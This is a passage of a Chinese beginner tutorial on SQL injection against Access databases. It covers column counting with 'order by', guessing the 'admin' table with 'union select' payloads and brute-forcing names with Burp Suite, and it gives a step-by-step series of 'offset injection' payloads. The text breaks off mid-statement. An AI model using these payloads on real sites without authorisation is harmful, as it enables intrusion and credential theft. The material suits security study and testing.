SQL注入基础入门——01、几种常见的注入形式
常用工具:SQLmap 数据库类型判断 SQL注入语句判断(配合工具) 搭建组合、信息搜集 端口扫描 一、Access注入(较少见,没有数据库名) 猜测有多少列(order by 22) 22正常,23错误 联合注入/暴力注入(union select 1,2,3,4,…,22 from admin) 此处猜测表名为admin,此处暴力破解,配合抓包工具 > 使用Burp Suite的变量功能,批量发送数据包,批量检查返回包来确定 <ol start="2"> <li> 为测试页面回显,依次在1,2,username,password,…,22写上列名<br /> 此处也需要暴力破解列名 </li> </ol> 偏移注入:解决表名获取到但列名获取不到的情况 表名获取不到,则必须要字典暴力破解 依次测试下列语句,直到不再报错: union select 1,2,3,4,…,19,20,21,* from admin union select 1,2,3,4,…,19,20,* from admin union select 1,2,3,4,…,19,* from admin union select 1,2,3,4,…,18,* from admin … 假设union select 1,2,3,4,…,16,* from admin正常显示,则admin中列的个数:22-16=6 4. 二级偏移16-6=10/三级偏移10-6=4/… union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a....